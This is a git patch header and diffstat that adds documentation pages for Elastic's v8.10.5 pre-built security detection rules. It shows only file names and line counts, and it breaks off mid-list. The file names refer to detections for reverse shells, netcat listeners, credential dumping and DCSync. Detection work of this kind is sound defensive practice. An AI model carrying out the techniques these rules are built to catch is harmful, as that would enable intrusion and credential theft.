From b4addb97c47f59a6774d2060e1095f120e80e1d0 Mon Sep 17 00:00:00 2001 From: protections machine <72879786+protectionsmachine@users.noreply.github.com> Date: Wed, 25 Oct 2023 15:20:31 +0200 Subject: [PATCH] [Detection Rules] Adding Documents for v8.10.5 Pre-Built Detection Rules (#4099) * Update latest docs * fixed links; updated downloadable updates description * removed references to deprecated rules * removed 'potential-dll-sideloading-via-trusted-microsoft-programs' * removed deprecations from summary --------- Co-authored-by: terrancedejesus <terrance.dejesus@elastic.co> --- ...l-process-id-or-lock-file-created.asciidoc | 122 +++ ...ess-to-a-sensitive-ldap-attribute.asciidoc | 130 +++ ...covery-command-via-system-account.asciidoc | 114 +++ ...5-account-password-reset-remotely.asciidoc | 89 ++ ...-hidden-file-attribute-via-attrib.asciidoc | 146 +++ ...le-8-10-5-adfind-command-activity.asciidoc | 144 +++ ...ule-8-10-5-adminsdholder-backdoor.asciidoc | 74 ++ ...insdholder-sdprop-exclusion-added.asciidoc | 121 +++ ...e-8-10-5-adobe-hijack-persistence.asciidoc | 132 +++ ...t-to-disable-iptables-or-firewall.asciidoc | 78 ++ ...attempt-to-disable-syslog-service.asciidoc | 70 ++ ...base32-encoding-decoding-activity.asciidoc | 67 ++ ...5-bash-shell-profile-modification.asciidoc | 80 ++ ...uted-from-shared-memory-directory.asciidoc | 69 ++ ...-10-5-bpf-filter-applied-using-tc.asciidoc | 69 ++ ...-10-5-bypass-uac-via-event-viewer.asciidoc | 147 +++ ...rule-8-10-5-chkconfig-service-add.asciidoc | 72 ++ ...-clearing-windows-console-history.asciidoc | 126 +++ ...-10-5-clearing-windows-event-logs.asciidoc | 120 +++ ...strike-command-and-control-beacon.asciidoc | 84 ++ ...icy-modification-through-registry.asciidoc | 132 +++ ...-execution-via-solarwinds-process.asciidoc | 103 ++ ...ell-activity-started-via-rundll32.asciidoc | 106 +++ ...-component-object-model-hijacking.asciidoc | 177 ++++ ...wned-by-suspicious-parent-process.asciidoc | 145 +++ ...n-to-commonly-abused-web-services.asciidoc | 207 ++++ ...on-to-external-network-via-telnet.asciidoc | 70 ++ ...on-to-internal-network-via-telnet.asciidoc | 70 ++ ...s-and-directories-via-commandline.asciidoc | 71 ++ ...tion-of-hidden-shared-object-file.asciidoc | 66 ++ ...new-gpo-scheduled-task-or-service.asciidoc | 91 ++ ...ged-by-previously-unknown-process.asciidoc | 97 ++ ...ting-backup-catalogs-with-wbadmin.asciidoc | 115 +++ ...ell-via-suspicious-parent-process.asciidoc | 95 ++ ...ecurity-logs-using-built-in-tools.asciidoc | 132 +++ ...control-via-registry-modification.asciidoc | 159 ++++ ...-security-settings-via-powershell.asciidoc | 128 +++ ...s-over-https-enabled-via-registry.asciidoc | 84 ++ ...t-rule-8-10-5-dynamic-linker-copy.asciidoc | 69 ++ ...ncrypting-files-with-winrar-or-7z.asciidoc | 124 +++ ...0-5-enumeration-of-kernel-modules.asciidoc | 63 ++ ...le-8-10-5-esxi-discovery-via-find.asciidoc | 62 ++ ...le-8-10-5-esxi-discovery-via-grep.asciidoc | 63 ++ ...-timestomping-using-touch-command.asciidoc | 66 ++ ...nge-mailbox-export-via-powershell.asciidoc | 128 +++ ...ssql-xp-cmdshell-stored-procedure.asciidoc | 132 +++ ...execution-via-tsclient-mountpoint.asciidoc | 77 ++ ...-expired-or-revoked-driver-loaded.asciidoc | 75 ++ ...g-exchange-mailbox-via-powershell.asciidoc | 137 +++ ...-deletion-in-suspicious-directory.asciidoc | 72 ++ ...le-8-10-5-file-deletion-via-shred.asciidoc | 64 ++ ...0-5-file-made-immutable-by-chattr.asciidoc | 68 ++ ...odification-in-writable-directory.asciidoc | 62 ++ ...r-listener-established-via-netcat.asciidoc | 133 +++ ...0-5-first-time-seen-driver-loaded.asciidoc | 144 +++ ...me-seen-account-performing-dcsync.asciidoc | 134 +++ ...fbaked-command-and-control-beacon.asciidoc | 84 ++ ...gh-number-of-process-terminations.asciidoc | 103 ++ ...t-rule-8-10-5-hosts-file-modified.asciidoc | 125 +++ ...ule-8-10-5-hping-process-activity.asciidoc | 65 ++ ...-file-execution-options-injection.asciidoc | 88 ++ ...to-an-unsecure-elasticsearch-node.asciidoc | 71 ++ ...ng-dcom-lateral-movement-with-mmc.asciidoc | 86 ++ ...execution-via-powershell-remoting.asciidoc | 84 ++ ...tion-of-security-support-provider.asciidoc | 91 ++ ...ractive-terminal-spawned-via-perl.asciidoc | 63 ++ ...ctive-terminal-spawned-via-python.asciidoc | 71 ++ ...-authentication-disabled-for-user.asciidoc | 127 +++ ...load-or-unload-via-kexec-detected.asciidoc | 90 ++ ...0-5-kernel-module-load-via-insmod.asciidoc | 69 ++ ...rule-8-10-5-kernel-module-removal.asciidoc | 81 ++ ...teral-movement-via-startup-folder.asciidoc | 95 ++ ...ux-init-pid-1-secret-dump-via-gdb.asciidoc | 67 ++ ...shell-breakout-via-linux-binary-s.asciidoc | 193 ++++ ...ux-user-added-to-privileged-group.asciidoc | 128 +++ ...count-tokenfilter-policy-disabled.asciidoc | 87 ++ ...ss-process-access-via-windows-api.asciidoc | 100 ++ ...uest-predicted-to-be-a-dga-domain.asciidoc | 77 ++ ...with-a-high-dga-probability-score.asciidoc | 77 ++ ...redicted-to-be-malicious-activity.asciidoc | 78 ++ ...-high-malicious-probability-score.asciidoc | 79 ++ ...using-a-known-sunburst-dns-domain.asciidoc | 77 ++ ...engine-started-an-unusual-process.asciidoc | 85 ++ ...ngine-started-by-a-script-process.asciidoc | 89 ++ ...ld-engine-using-an-alternate-name.asciidoc | 135 +++ ...-um-spawning-suspicious-processes.asciidoc | 92 ++ ...erver-um-writing-suspicious-files.asciidoc | 104 ++ ...ker-spawning-suspicious-processes.asciidoc | 95 ++ ...rosoft-windows-defender-tampering.asciidoc | 146 +++ ...cation-of-amsienable-registry-key.asciidoc | 137 +++ ...amic-linker-preload-shared-object.asciidoc | 69 ++ ...-modification-of-openssh-binaries.asciidoc | 101 ++ ...ntication-module-or-configuration.asciidoc | 101 ++ ...on-of-the-mspkiaccountcredentials.asciidoc | 76 ++ ...espace-manipulation-using-unshare.asciidoc | 68 ++ ...t-listener-established-via-rlwrap.asciidoc | 66 ++ ...network-activity-detected-via-cat.asciidoc | 67 ++ ...-via-recently-compiled-executable.asciidoc | 76 ++ ...nnection-via-registration-utility.asciidoc | 150 +++ ...work-connection-via-signed-binary.asciidoc | 134 +++ ...oweddeviceid-added-via-powershell.asciidoc | 92 ++ ...ted-by-previously-unknown-process.asciidoc | 94 ++ ...-8-10-5-new-systemd-timer-created.asciidoc | 140 +++ ...ule-8-10-5-nping-process-activity.asciidoc | 64 ++ ...-ntds-or-sam-database-file-copied.asciidoc | 91 ++ ...sessionpipe-registry-modification.asciidoc | 81 ++ ...uled-task-activity-via-powershell.asciidoc | 78 ++ ...-10-5-parent-process-pid-spoofing.asciidoc | 116 +++ ...tence-via-hidden-run-key-detected.asciidoc | 109 +++ ...ript-or-desktop-file-modification.asciidoc | 80 ++ ...tence-via-microsoft-office-addins.asciidoc | 84 ++ ...ersistence-via-powershell-profile.asciidoc | 87 ++ ...ycontroller-scheduled-task-hijack.asciidoc | 105 +++ ...pdate-orchestrator-service-hijack.asciidoc | 158 ++++ ...stence-via-wmi-event-subscription.asciidoc | 89 ++ ...0-5-port-forwarding-rule-addition.asciidoc | 125 +++ ...-dga-command-and-control-behavior.asciidoc | 82 ++ ...ial-code-execution-via-postgresql.asciidoc | 69 ++ ...tial-credential-access-via-dcsync.asciidoc | 150 +++ ...tial-access-via-lsass-memory-dump.asciidoc | 91 ++ ...cess-via-renamed-com-services-dll.asciidoc | 93 ++ ...ess-via-trusted-developer-utility.asciidoc | 150 +++ ...tial-access-via-windows-utilities.asciidoc | 159 ++++ ...-curl-cve-2023-38545-exploitation.asciidoc | 68 ++ ...ty-to-an-unusual-destination-port.asciidoc | 58 ++ ...activity-to-an-unusual-ip-address.asciidoc | 58 ++ ...n-activity-to-an-unusual-iso-code.asciidoc | 58 ++ ...ion-activity-to-an-unusual-region.asciidoc | 58 ++ ...tential-defense-evasion-via-proot.asciidoc | 61 ++ ...ule-8-10-5-potential-dga-activity.asciidoc | 58 ++ ...5-potential-disabling-of-apparmor.asciidoc | 66 ++ ...-5-potential-disabling-of-selinux.asciidoc | 66 ++ ...ng-via-trusted-microsoft-programs.asciidoc | 89 ++ ...ential-dns-tunneling-via-nslookup.asciidoc | 115 +++ ...al-linux-ssh-brute-force-detected.asciidoc | 118 +++ ...tential-file-transfer-via-certreq.asciidoc | 84 ++ ...-hidden-process-via-mount-hidepid.asciidoc | 62 ++ ...al-linux-ssh-brute-force-detected.asciidoc | 114 +++ ...teral-tool-transfer-via-smb-share.asciidoc | 123 +++ ...ux-backdoor-user-account-creation.asciidoc | 123 +++ ...ntial-dumping-via-proc-filesystem.asciidoc | 76 ++ ...x-credential-dumping-via-unshadow.asciidoc | 68 ++ ...otential-linux-hack-tool-launched.asciidoc | 73 ++ ...ocal-account-brute-force-detected.asciidoc | 67 ++ ...ransomware-note-creation-detected.asciidoc | 67 ++ ...-tunneling-and-or-port-forwarding.asciidoc | 77 ++ ...tential-local-ntlm-relay-via-http.asciidoc | 87 ++ ...asquerading-as-communication-apps.asciidoc | 134 +++ ...tential-meterpreter-reverse-shell.asciidoc | 81 ++ ...5-potential-network-scan-detected.asciidoc | 74 ++ ...l-network-scan-executed-from-host.asciidoc | 60 ++ ...-potential-network-sweep-detected.asciidoc | 75 ++ ...-non-standard-port-ssh-connection.asciidoc | 70 ++ ...openssh-backdoor-logging-activity.asciidoc | 103 ++ ...rsistence-through-init-d-detected.asciidoc | 138 +++ ...rough-motd-file-creation-detected.asciidoc | 133 +++ ...ence-through-run-control-detected.asciidoc | 141 +++ ...ce-via-time-provider-modification.asciidoc | 85 ++ ...rint-processor-registration-abuse.asciidoc | 95 ++ ...on-through-writable-docker-socket.asciidoc | 67 ++ ...on-via-container-misconfiguration.asciidoc | 67 ++ ...lege-escalation-via-cve-2023-4911.asciidoc | 64 ++ ...alation-via-installerfiletakeover.asciidoc | 140 +++ ...rivilege-escalation-via-overlayfs.asciidoc | 67 ++ ...l-privilege-escalation-via-pkexec.asciidoc | 77 ++ ...-escalation-via-python-cap-setuid.asciidoc | 71 ++ ...-via-recently-compiled-executable.asciidoc | 68 ++ ...tion-via-uid-int-max-bug-detected.asciidoc | 64 ++ ...ation-via-samaccountname-spoofing.asciidoc | 96 ++ ...-process-injection-via-powershell.asciidoc | 143 +++ ...tocol-tunneling-via-chisel-client.asciidoc | 70 ++ ...tocol-tunneling-via-chisel-server.asciidoc | 70 ++ ...-protocol-tunneling-via-earthworm.asciidoc | 66 ++ ...-pspy-process-monitoring-detected.asciidoc | 67 ++ ...ote-code-execution-via-web-server.asciidoc | 154 +++ ...remote-desktop-shadowing-activity.asciidoc | 93 ++ ...remote-desktop-tunneling-detected.asciidoc | 122 +++ ...verse-shell-activity-via-terminal.asciidoc | 113 +++ ...erse-shell-via-background-process.asciidoc | 73 ++ ...-potential-reverse-shell-via-java.asciidoc | 81 ++ ...verse-shell-via-suspicious-binary.asciidoc | 90 ++ ...hell-via-suspicious-child-process.asciidoc | 97 ++ ...5-potential-reverse-shell-via-udp.asciidoc | 86 ++ ...le-8-10-5-potential-reverse-shell.asciidoc | 80 ++ ...file-deletion-via-sdelete-utility.asciidoc | 116 +++ ...e-read-via-command-line-utilities.asciidoc | 79 ++ ...l-via-wildcard-injection-detected.asciidoc | 77 ++ ...ential-ssh-it-ssh-worm-downloaded.asciidoc | 78 ++ ...x-ftp-brute-force-attack-detected.asciidoc | 73 ++ ...x-rdp-brute-force-attack-detected.asciidoc | 71 ++ ...successful-ssh-brute-force-attack.asciidoc | 109 +++ ...potential-sudo-hijacking-detected.asciidoc | 77 ++ ...ege-escalation-via-cve-2019-14287.asciidoc | 63 ++ ...anipulation-via-process-injection.asciidoc | 77 ++ ...icious-debugfs-root-device-access.asciidoc | 69 ++ ...l-syn-based-network-scan-detected.asciidoc | 74 ++ ...s-via-wildcard-injection-detected.asciidoc | 77 ++ ...-upgrade-of-non-interactive-shell.asciidoc | 69 ++ ...indows-error-manager-masquerading.asciidoc | 131 +++ ...10-5-powershell-keylogging-script.asciidoc | 138 +++ ...ell-script-block-logging-disabled.asciidoc | 125 +++ ...wershell-share-enumeration-script.asciidoc | 141 +++ ...ery-related-windows-api-functions.asciidoc | 177 ++++ ...t-with-audio-capture-capabilities.asciidoc | 133 +++ ...ion-by-the-microsoft-build-engine.asciidoc | 77 ++ ...-started-from-process-id-pid-file.asciidoc | 84 ++ ...-termination-followed-by-deletion.asciidoc | 141 +++ ...-8-10-5-psexec-network-connection.asciidoc | 134 +++ ...e-8-10-5-rdp-enabled-via-registry.asciidoc | 128 +++ ...istry-persistence-via-appcert-dll.asciidoc | 93 ++ ...istry-persistence-via-appinit-dll.asciidoc | 146 +++ ...-remote-execution-via-file-shares.asciidoc | 125 +++ ...e-download-via-script-interpreter.asciidoc | 136 +++ ...-task-created-by-a-windows-script.asciidoc | 101 ++ ...d-task-execution-at-scale-via-gpo.asciidoc | 131 +++ ...cheduled-tasks-at-command-enabled.asciidoc | 94 ++ ...urity-software-discovery-via-grep.asciidoc | 145 +++ ...-10-5-sensitive-files-compression.asciidoc | 112 +++ ...ationprivilege-assigned-to-a-user.asciidoc | 119 +++ ...ol-spawned-via-script-interpreter.asciidoc | 165 ++++ ...tcap-setuid-setgid-capability-set.asciidoc | 68 ++ ...ged-by-previously-unknown-process.asciidoc | 70 ++ ...s-disabling-services-via-registry.asciidoc | 106 +++ ...to-an-external-device-via-airdrop.asciidoc | 58 ++ ...-bytes-sent-to-an-external-device.asciidoc | 58 ++ ...authorized-keys-file-modification.asciidoc | 100 ++ ...-persistence-via-unsigned-process.asciidoc | 153 +++ ...sudo-command-enumeration-detected.asciidoc | 62 ++ ...-8-10-5-sudoers-file-modification.asciidoc | 65 ++ ...5-suid-sguid-enumeration-detected.asciidoc | 82 ++ ...-suspicious-cmd-execution-via-wmi.asciidoc | 81 ++ ...racted-or-decompressed-via-funzip.asciidoc | 83 ++ ...ta-encryption-via-openssl-utility.asciidoc | 68 ++ ...rsistence-or-privilege-escalation.asciidoc | 168 ++++ ...-endpoint-security-parent-process.asciidoc | 82 ++ ...s-execution-from-a-mounted-device.asciidoc | 105 +++ ...ious-execution-via-scheduled-task.asciidoc | 123 +++ ...suspicious-explorer-child-process.asciidoc | 121 +++ ...us-file-changes-activity-detected.asciidoc | 64 ++ ...e-creation-in-etc-for-persistence.asciidoc | 114 +++ ...-load-taskschd-dll-from-ms-office.asciidoc | 94 ++ ...icious-imagepath-service-creation.asciidoc | 79 ++ ...0-5-suspicious-java-child-process.asciidoc | 110 +++ ...ious-managed-code-hosting-process.asciidoc | 74 ++ ...ous-mining-process-creation-event.asciidoc | 67 ++ ...uspicious-ms-office-child-process.asciidoc | 157 +++ ...spicious-ms-outlook-child-process.asciidoc | 156 +++ ...5-suspicious-net-code-compilation.asciidoc | 90 ++ ...ous-net-reflection-via-powershell.asciidoc | 166 ++++ ...-by-previously-unknown-executable.asciidoc | 80 ++ ...spicious-pdf-reader-child-process.asciidoc | 143 +++ ...able-encoded-in-powershell-script.asciidoc | 143 +++ ...ess-access-via-direct-system-call.asciidoc | 152 +++ ...ion-via-renamed-psexec-executable.asciidoc | 119 +++ ...rocess-spawned-from-motd-detected.asciidoc | 152 +++ ...picious-rdp-activex-client-loaded.asciidoc | 93 ++ ...stry-access-via-sebackupprivilege.asciidoc | 126 +++ ...suspicious-renaming-of-esxi-files.asciidoc | 67 ++ ...-renaming-of-esxi-index-html-file.asciidoc | 66 ++ ...uspicious-script-object-execution.asciidoc | 85 ++ ...startup-shell-folder-modification.asciidoc | 152 +++ ...-suspicious-symbolic-link-created.asciidoc | 92 ++ ...-by-previously-unknown-executable.asciidoc | 73 ++ ...cious-termination-of-esxi-process.asciidoc | 62 ++ ...-utility-launched-via-proxychains.asciidoc | 65 ++ ...suspicious-werfault-child-process.asciidoc | 109 +++ ...process-cluster-spawned-by-a-host.asciidoc | 59 ++ ...uster-spawned-by-a-parent-process.asciidoc | 61 ++ ...process-cluster-spawned-by-a-user.asciidoc | 61 ++ ...picious-wmic-xsl-script-execution.asciidoc | 76 ++ ...0-5-suspicious-zoom-child-process.asciidoc | 136 +++ ...bolic-link-to-shadow-copy-created.asciidoc | 146 +++ ...-or-moved-to-suspicious-directory.asciidoc | 93 ++ ...e-8-10-5-system-log-file-deletion.asciidoc | 83 ++ ...8-10-5-system-shells-via-services.asciidoc | 137 +++ ...mporarily-scheduled-task-creation.asciidoc | 81 ++ ...es-deleted-via-unexpected-process.asciidoc | 131 +++ ...nternet-explorer-add-on-installer.asciidoc | 108 +++ ...eged-ifileoperation-com-interface.asciidoc | 103 ++ ...ia-windows-directory-masquerading.asciidoc | 151 +++ ...ademanager-elevated-com-interface.asciidoc | 106 +++ ...diskcleanup-scheduled-task-hijack.asciidoc | 105 +++ ...icmluautil-elevated-com-interface.asciidoc | 104 ++ ...a-windows-firewall-snap-in-hijack.asciidoc | 154 +++ ...-5-unsigned-dll-loaded-by-svchost.asciidoc | 179 ++++ ...-loading-from-a-suspicious-folder.asciidoc | 161 ++++ ...le-8-10-5-untrusted-driver-loaded.asciidoc | 135 +++ ...-unusual-child-process-of-dns-exe.asciidoc | 113 +++ ...tion-by-a-system-critical-process.asciidoc | 139 +++ ...sual-file-modification-by-dns-exe.asciidoc | 83 ++ ...vity-from-a-windows-system-binary.asciidoc | 189 ++++ ...persistence-via-services-registry.asciidoc | 94 ++ ...unusual-process-spawned-by-a-host.asciidoc | 61 ++ ...ocess-spawned-by-a-parent-process.asciidoc | 61 ++ ...unusual-process-spawned-by-a-user.asciidoc | 61 ++ ...riting-data-to-an-external-device.asciidoc | 58 ++ ...t-child-process-childless-service.asciidoc | 107 +++ ...user-privilege-enumeration-via-id.asciidoc | 62 ++ ...-5-virtual-machine-fingerprinting.asciidoc | 68 ++ ...adow-copy-deletion-via-powershell.asciidoc | 148 +++ ...ume-shadow-copy-deletion-via-wmic.asciidoc | 138 +++ ...ess-child-of-common-web-processes.asciidoc | 157 +++ ...isabled-via-registry-modification.asciidoc | 142 +++ ...-firewall-disabled-via-powershell.asciidoc | 129 +++ ...ndows-script-executing-powershell.asciidoc | 142 +++ ...rpreter-executing-process-via-wmi.asciidoc | 112 +++ ...0-5-wmi-incoming-lateral-movement.asciidoc | 89 ++ .../prebuilt-rules-8-10-5-appendix.asciidoc | 313 ++++++ .../prebuilt-rules-8-10-5-summary.asciidoc | 626 ++++++++++++ .../prebuilt-rules-changelog.asciidoc | 4 - ...ebuilt-rules-downloadable-updates.asciidoc | 10 + .../prebuilt-rules-reference.asciidoc | 892 ++++++++++-------- .../prebuilt-rules/rule-desc-index.asciidoc | 54 +- ...l-process-id-or-lock-file-created.asciidoc | 5 +- ...ess-to-a-sensitive-ldap-attribute.asciidoc | 23 +- ...covery-command-via-system-account.asciidoc | 15 +- .../account-password-reset-remotely.asciidoc | 11 +- ...-hidden-file-attribute-via-attrib.asciidoc | 11 +- .../adfind-command-activity.asciidoc | 6 +- ...vileges-assigned-to-an-okta-group.asciidoc | 2 +- ...tor-role-assigned-to-an-okta-user.asciidoc | 2 +- .../adminsdholder-backdoor.asciidoc | 14 +- ...insdholder-sdprop-exclusion-added.asciidoc | 14 +- .../adobe-hijack-persistence.asciidoc | 6 +- ...chive-file-with-unusual-extension.asciidoc | 83 ++ .../at-exe-command-lateral-movement.asciidoc | 6 +- .../attempt-to-create-okta-api-token.asciidoc | 2 +- ...to-deactivate-an-okta-application.asciidoc | 2 +- ...o-deactivate-an-okta-network-zone.asciidoc | 2 +- ...to-deactivate-an-okta-policy-rule.asciidoc | 2 +- ...empt-to-deactivate-an-okta-policy.asciidoc | 2 +- ...vate-mfa-for-an-okta-user-account.asciidoc | 2 +- ...mpt-to-delete-an-okta-application.asciidoc | 2 +- ...pt-to-delete-an-okta-network-zone.asciidoc | 2 +- ...mpt-to-delete-an-okta-policy-rule.asciidoc | 2 +- .../attempt-to-delete-an-okta-policy.asciidoc | 2 +- ...t-to-disable-iptables-or-firewall.asciidoc | 2 +- ...attempt-to-disable-syslog-service.asciidoc | 2 +- ...mpt-to-modify-an-okta-application.asciidoc | 2 +- ...pt-to-modify-an-okta-network-zone.asciidoc | 2 +- ...mpt-to-modify-an-okta-policy-rule.asciidoc | 2 +- .../attempt-to-modify-an-okta-policy.asciidoc | 2 +- ...-factors-for-an-okta-user-account.asciidoc | 2 +- .../attempt-to-revoke-okta-api-token.asciidoc | 2 +- .../attempted-bypass-of-okta-mfa.asciidoc | 2 +- ...-brute-force-an-okta-user-account.asciidoc | 2 +- .../aws-cloudtrail-log-created.asciidoc | 2 +- .../aws-cloudtrail-log-deleted.asciidoc | 2 +- .../aws-cloudtrail-log-suspended.asciidoc | 2 +- .../aws-cloudtrail-log-updated.asciidoc | 2 +- .../aws-cloudwatch-alarm-deletion.asciidoc | 2 +- ...aws-cloudwatch-log-group-deletion.asciidoc | 2 +- ...ws-cloudwatch-log-stream-deletion.asciidoc | 2 +- .../aws-config-resource-deletion.asciidoc | 2 +- ...ws-configuration-recorder-stopped.asciidoc | 2 +- ...letion-of-rds-instance-or-cluster.asciidoc | 2 +- .../aws-ec2-encryption-disabled.asciidoc | 2 +- ...l-network-packet-capture-detected.asciidoc | 2 +- ...work-access-control-list-creation.asciidoc | 2 +- ...work-access-control-list-deletion.asciidoc | 2 +- .../aws-ec2-snapshot-activity.asciidoc | 2 +- .../aws-ec2-vm-export-failure.asciidoc | 2 +- ...-efs-file-system-or-mount-deleted.asciidoc | 2 +- ...lasticache-security-group-created.asciidoc | 2 +- ...ecurity-group-modified-or-deleted.asciidoc | 2 +- ...ntbridge-rule-disabled-or-deleted.asciidoc | 2 +- .../aws-execution-via-system-manager.asciidoc | 2 +- .../aws-guardduty-detector-deletion.asciidoc | 2 +- ...aws-iam-assume-role-policy-update.asciidoc | 2 +- ...brute-force-of-assume-role-policy.asciidoc | 2 +- ...ws-iam-deactivation-of-mfa-device.asciidoc | 2 +- .../aws-iam-group-creation.asciidoc | 2 +- .../aws-iam-group-deletion.asciidoc | 2 +- ...s-iam-password-recovery-requested.asciidoc | 2 +- .../aws-iam-user-addition-to-group.asciidoc | 2 +- ...isabled-or-scheduled-for-deletion.asciidoc | 2 +- ...brute-force-of-root-user-identity.asciidoc | 2 +- ...aws-management-console-root-login.asciidoc | 2 +- .../aws-rds-cluster-creation.asciidoc | 2 +- ...aws-rds-instance-cluster-stoppage.asciidoc | 2 +- .../aws-rds-instance-creation.asciidoc | 2 +- .../aws-rds-security-group-creation.asciidoc | 2 +- .../aws-rds-security-group-deletion.asciidoc | 2 +- .../aws-rds-snapshot-export.asciidoc | 2 +- .../aws-rds-snapshot-restored.asciidoc | 2 +- .../aws-redshift-cluster-creation.asciidoc | 2 +- .../aws-root-login-without-mfa.asciidoc | 2 +- ...-53-domain-transfer-lock-disabled.asciidoc | 2 +- ...in-transferred-to-another-account.asciidoc | 2 +- .../aws-route-table-created.asciidoc | 2 +- ...s-route-table-modified-or-deleted.asciidoc | 2 +- ...hosted-zone-associated-with-a-vpc.asciidoc | 2 +- ...-s3-bucket-configuration-deletion.asciidoc | 2 +- .../rule-details/aws-saml-activity.asciidoc | 2 +- ...up-configuration-change-detection.asciidoc | 2 +- ...oken-service-sts-assumerole-usage.asciidoc | 2 +- .../aws-sts-getsessiontoken-abuse.asciidoc | 2 +- .../aws-vpc-flow-logs-deletion.asciidoc | 2 +- ...-waf-access-control-list-deletion.asciidoc | 2 +- ...s-waf-rule-or-rule-group-deletion.asciidoc | 2 +- ...base32-encoding-decoding-activity.asciidoc | 2 +- .../bash-shell-profile-modification.asciidoc | 20 +- .../binary-content-copy-via-cmd-exe.asciidoc | 15 +- ...uted-from-shared-memory-directory.asciidoc | 2 +- .../bpf-filter-applied-using-tc.asciidoc | 2 +- .../bypass-uac-via-event-viewer.asciidoc | 15 +- .../bypass-uac-via-sdclt.asciidoc | 13 + .../chkconfig-service-add.asciidoc | 2 +- .../clearing-windows-console-history.asciidoc | 15 +- .../clearing-windows-event-logs.asciidoc | 6 +- ...strike-command-and-control-beacon.asciidoc | 8 +- ...icy-modification-through-registry.asciidoc | 6 +- ...-execution-via-solarwinds-process.asciidoc | 11 +- ...ell-activity-started-via-rundll32.asciidoc | 15 +- .../component-object-model-hijacking.asciidoc | 24 +- ...wned-by-suspicious-parent-process.asciidoc | 20 +- ...n-to-commonly-abused-web-services.asciidoc | 10 +- ...on-to-external-network-via-telnet.asciidoc | 2 +- ...on-to-internal-network-via-telnet.asciidoc | 2 +- ...s-and-directories-via-commandline.asciidoc | 43 +- ...tion-of-hidden-shared-object-file.asciidoc | 43 +- ...new-gpo-scheduled-task-or-service.asciidoc | 15 +- ...ged-by-previously-unknown-process.asciidoc | 4 +- .../delayed-execution-via-ping.asciidoc | 149 +++ ...ting-backup-catalogs-with-wbadmin.asciidoc | 6 +- ...ell-via-suspicious-parent-process.asciidoc | 95 ++ ...ecurity-logs-using-built-in-tools.asciidoc | 6 +- ...control-via-registry-modification.asciidoc | 14 +- ...-security-settings-via-powershell.asciidoc | 15 +- ...s-over-https-enabled-via-registry.asciidoc | 6 +- .../rule-details/dynamic-linker-copy.asciidoc | 2 +- ...ncrypting-files-with-winrar-or-7z.asciidoc | 6 +- ...ration-of-kernel-modules-via-proc.asciidoc | 11 +- .../enumeration-of-kernel-modules.asciidoc | 5 +- .../esxi-discovery-via-find.asciidoc | 2 +- .../esxi-discovery-via-grep.asciidoc | 2 +- ...-timestomping-using-touch-command.asciidoc | 2 +- ...nge-mailbox-export-via-powershell.asciidoc | 6 +- ...table-file-with-unusual-extension.asciidoc | 80 ++ ...ble-media-with-network-connection.asciidoc | 68 ++ .../execution-of-an-unsigned-service.asciidoc | 15 +- ...a-microsoft-dotnet-clickonce-host.asciidoc | 71 ++ ...isualstudio-pre-post-build-events.asciidoc | 108 +++ ...ssql-xp-cmdshell-stored-procedure.asciidoc | 6 +- ...execution-via-tsclient-mountpoint.asciidoc | 6 +- .../expired-or-revoked-driver-loaded.asciidoc | 16 +- ...g-exchange-mailbox-via-powershell.asciidoc | 15 +- ...-deletion-in-suspicious-directory.asciidoc | 2 +- .../file-deletion-via-shred.asciidoc | 2 +- .../file-made-immutable-by-chattr.asciidoc | 43 +- ...odification-in-writable-directory.asciidoc | 12 +- ...ged-in-root-folder-of-recycle-bin.asciidoc | 6 +- ...r-listener-established-via-netcat.asciidoc | 3 +- ...value-accessed-in-secrets-manager.asciidoc | 2 +- .../first-time-seen-driver-loaded.asciidoc | 11 +- ...me-seen-account-performing-dcsync.asciidoc | 15 +- ...fbaked-command-and-control-beacon.asciidoc | 10 +- ...password-reset-or-unlock-attempts.asciidoc | 2 +- ...gh-number-of-process-terminations.asciidoc | 3 +- .../rule-details/hosts-file-modified.asciidoc | 8 +- .../hping-process-activity.asciidoc | 2 +- ...-file-execution-options-injection.asciidoc | 11 +- ...age-loaded-with-invalid-signature.asciidoc | 70 ++ ...to-an-unsecure-elasticsearch-node.asciidoc | 6 +- ...ng-dcom-lateral-movement-with-mmc.asciidoc | 15 +- ...execution-via-powershell-remoting.asciidoc | 15 +- ...tion-of-security-support-provider.asciidoc | 11 +- ...ractive-terminal-spawned-via-perl.asciidoc | 2 +- ...ctive-terminal-spawned-via-python.asciidoc | 10 +- ...-authentication-disabled-for-user.asciidoc | 24 +- ...load-or-unload-via-kexec-detected.asciidoc | 2 +- .../kernel-module-load-via-insmod.asciidoc | 5 +- .../kernel-module-removal.asciidoc | 2 +- .../rule-details/kirbi-file-creation.asciidoc | 14 +- ...teral-movement-via-startup-folder.asciidoc | 6 +- ...ux-init-pid-1-secret-dump-via-gdb.asciidoc | 2 +- ...shell-breakout-via-linux-binary-s.asciidoc | 36 +- ...ux-user-added-to-privileged-group.asciidoc | 3 +- ...count-tokenfilter-policy-disabled.asciidoc | 26 +- ...ss-process-access-via-windows-api.asciidoc | 11 +- ...uest-predicted-to-be-a-dga-domain.asciidoc | 77 ++ ...with-a-high-dga-probability-score.asciidoc | 77 ++ ...redicted-to-be-malicious-activity.asciidoc | 78 ++ ...-high-malicious-probability-score.asciidoc | 79 ++ ...using-a-known-sunburst-dns-domain.asciidoc | 77 ++ ...-dump-file-with-unusual-extension.asciidoc | 86 ++ ...engine-started-an-unusual-process.asciidoc | 10 +- ...ngine-started-by-a-script-process.asciidoc | 18 +- ...ld-engine-using-an-alternate-name.asciidoc | 10 +- ...-um-spawning-suspicious-processes.asciidoc | 11 +- ...erver-um-writing-suspicious-files.asciidoc | 11 +- ...ker-spawning-suspicious-processes.asciidoc | 19 +- ...rosoft-windows-defender-tampering.asciidoc | 6 +- ...cation-of-amsienable-registry-key.asciidoc | 6 +- ...amic-linker-preload-shared-object.asciidoc | 8 +- .../modification-of-openssh-binaries.asciidoc | 5 +- ...ntication-module-or-configuration.asciidoc | 18 +- ...on-of-the-mspkiaccountcredentials.asciidoc | 2 +- ...n-okta-application-sign-on-policy.asciidoc | 2 +- ...espace-manipulation-using-unshare.asciidoc | 2 +- ...t-listener-established-via-rlwrap.asciidoc | 66 ++ ...network-activity-detected-via-cat.asciidoc | 10 +- ...-via-recently-compiled-executable.asciidoc | 2 +- ...nnection-via-registration-utility.asciidoc | 7 +- ...work-connection-via-signed-binary.asciidoc | 6 +- ...level-authentication-nla-disabled.asciidoc | 6 +- ...oweddeviceid-added-via-powershell.asciidoc | 15 +- ...ted-by-previously-unknown-process.asciidoc | 21 +- .../new-systemd-timer-created.asciidoc | 7 +- .../nping-process-activity.asciidoc | 2 +- .../ntds-or-sam-database-file-copied.asciidoc 